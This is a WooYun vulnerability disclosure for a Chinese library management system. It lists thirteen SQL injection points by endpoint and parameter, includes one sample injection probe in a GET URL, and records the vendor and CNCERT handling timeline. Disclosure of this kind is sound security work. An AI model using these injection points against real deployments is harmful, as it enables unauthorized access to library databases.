当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145611

漏洞标题:骅阜图书管理系统13个SQL注射打包

相关厂商:广州骅阜计算机软件有限公司

漏洞作者: 路人甲

提交时间:2015-10-19 17:17

修复时间:2016-01-21 11:20

公开时间:2016-01-21 11:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-19: 细节已通知厂商并且等待厂商处理中
2015-10-23: 厂商已经确认,细节仅向厂商公开
2015-10-26: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-12-17: 细节向核心白帽子及相关领域专家公开
2015-12-27: 细节向普通白帽子公开
2016-01-06: 细节向实习白帽子公开
2016-01-21: 细节向公众公开

简要描述:

详细说明:

官网部分案例:
http://**.**.**.**/server/tsg/lib_ml.asp
POST SQL Injection:

1、POST /userlib/login.asp     txtUser参数存在注入
POST Data:txtUser=1&txtPass=1    
2、POST /userlib/baokanuser.asp   txtName参数存在注入
POST Data: txtName=1&Submit=%EF%BF%BD%EF%BF%BD%D1%AF&txtNo=1
3、POST /userlib/baokansearch.asp txtNo参数存在注入
POST Data: txtName=111111&Submit=%EF%BF%BD%EF%BF%BD%D1%AF&txtNo=111111
4、POST /userlib/baokanruku.asp  txtIndex参数存在注入
POST Data: txtBookNo=1&txtName=111&txtIndex=111&Submit=%EF%BF%BD%EF%BF%BD%D1%AF&txtNo=111
5、POST /userlib/searchbook/bookfind.asp  txtJiezhi参数存在注入
POST Data:
 sid=uhAqYz1gjOLGnwlb&SCREEN=search_result&ACTION=SEARCH_MULTY&Submit3=%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%D1%AF&txtJiezhi=111
6、POST /userlib/newbook.asp?newsign=1   txtTitle参数存在注入
POST Data:
txtDayBegin=2015-10-2&txtDayEnd=2015-10-9&Submit=%EF%BF%BD%EF%BF%BD%D1%AF&txtTitle=1111 可能存在POST sql注入漏洞
7、/userlib/bookfind.asp   txtName参数存在注入
POST Data:B2=%EF%BF%BD%EF%BF%BD%D1%AF&txtName=1


GET注入:

1、/userlib/bookfind.asp?txtAuth=1')and%20@@version%3E0--
2、/userlib/bookyuyue.asp?bookid=1
3、/userlib/bookstatus.asp?bookid=1
4、/userlib/baokanrukuinfo.asp?id=1
5、/userlib/baokaninfo.asp?code=1-1&mark=
6、/userlib/ViewOutDate.asp?peid=


Error:

Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e21'
ODBC 驱动程序不支持所需的属性。
/userlib/baokanuser.asp,行 35


Case:

http://**.**.**.**:8002/userlib/
http://**.**.**.**/tsgweb/userlib/
http://**.**.**.**:88/userlib/
http://**.**.**.**/userlib/
http://**.**.**.**/userlib/
http://**.**.**.**/tsg/userlib/
http://**.**.**.**/userlib/
**.**.**.**:88/userlib/
http://**.**.**.**/userlib/
http://**.**.**.**/userlib/
http://**.**.**.**:88/userlib/

漏洞证明:

Security Testing:

1、/userlib/login.asp
01.png







02.png







03.png




2、/userlib/baokanuser.asp



04.png







05.png




3、/userlib/baokansearch.asp



06.png







07.png




4、/userlib//baokanruku.asp



08.png







09.png




5、/userlib/searchbook/bookfind.asp



10.png







11.png




6、/userlib/newbook.asp?newsign=1



17.png







18.png




7、/userlib/bookfind.asp



23.png







24.png




8、/userlib/bookfind.asp?txtAuth=1



12.png




9、/userlib/bookyuyue.asp?bookid=1



13.png







14.png




10、/userlib/bookstatus.asp?bookid=1



15.png







16.png




11、/userlib/baokaninfo.asp?code=1-1&mark=



19.png







20.png




12、/userlib/baokanrukuinfo.asp?id=1



21.png







22.png




13、/userlib/ViewOutDate.asp?peid=



25.png







26.png

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-10-23 11:13

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给广东分中心,由其后续协调网站管理单位处置。

最新状态:

暂无